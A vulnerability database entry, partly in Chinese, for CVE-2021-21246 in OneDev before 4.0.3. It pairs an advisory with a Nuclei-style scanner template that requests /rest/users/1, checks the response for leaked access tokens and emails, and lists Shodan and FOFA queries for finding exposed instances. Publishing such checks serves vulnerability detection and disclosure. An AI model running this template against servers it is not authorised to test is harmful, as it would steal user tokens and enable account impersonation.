CVE-2021-21246: OneDev < 4.0.3 - User Access Token Leak

日期: 2026-01-24 | 影响软件: OneDev | POC: 已公开

漏洞描述

OneDev before version 4.0.3 contains an insecure endpoint that allows retrieval of arbitrary user details, including access tokens, due to missing security checks on /users/{id}, letting attackers leak sensitive data and impersonate users, exploit requires no special conditions.

PoC代码[已公开]

id: CVE-2021-21246

info:
  name: OneDev < 4.0.3 - User Access Token Leak
  author: DhiyaneshDk
  severity: high
  description: |
    OneDev before version 4.0.3 contains an insecure endpoint that allows retrieval of arbitrary user details, including access tokens, due to missing security checks on /users/{id}, letting attackers leak sensitive data and impersonate users, exploit requires no special conditions.
  impact: |
    Attackers can access sensitive user data and tokens, leading to impersonation, data leaks, and potential full account compromise.
  remediation: |
    Update to version 4.0.3 or later where user info is removed from the REST API.
  reference:
    - https://github.com/theonedev/onedev/security/advisories/GHSA-66v7-gg85-f4gx
    - https://github.com/theonedev/onedev/commit/a4491e5f79dc6cc96eac20972eedc8905ddf6089
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21246
    - https://securitylab.github.com/advisories/GHSL-2020-214_223-onedev/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2021-21246
    cwe-id: CWE-862
    epss-score: 0.00291
    epss-percentile: 0.52084
  metadata:
    verified: true
    max-request: 1
    vendor: onedev_project
    product: onedev
    shodan-query: title:"OneDev"
    fofa-query: title="OneDev"
  tags: cve,cve2021,onedev,auth-bypass,token-leak

http:
  - method: GET
    path:
      - "{{BaseURL}}/rest/users/1"

    headers:
      Content-Type: application/json

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"accessToken"'
          - '"email"'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100fd285e82812c935dc8a8e215fad94e5829097b2fad46a9faf199ff033a991bec022100cd210215a9f9a1cc79ad42be0f086b4d6c84467086a8e9adb4ec109b921d0378:922c64590222798bb761d5b6d8e72950

相关漏洞推荐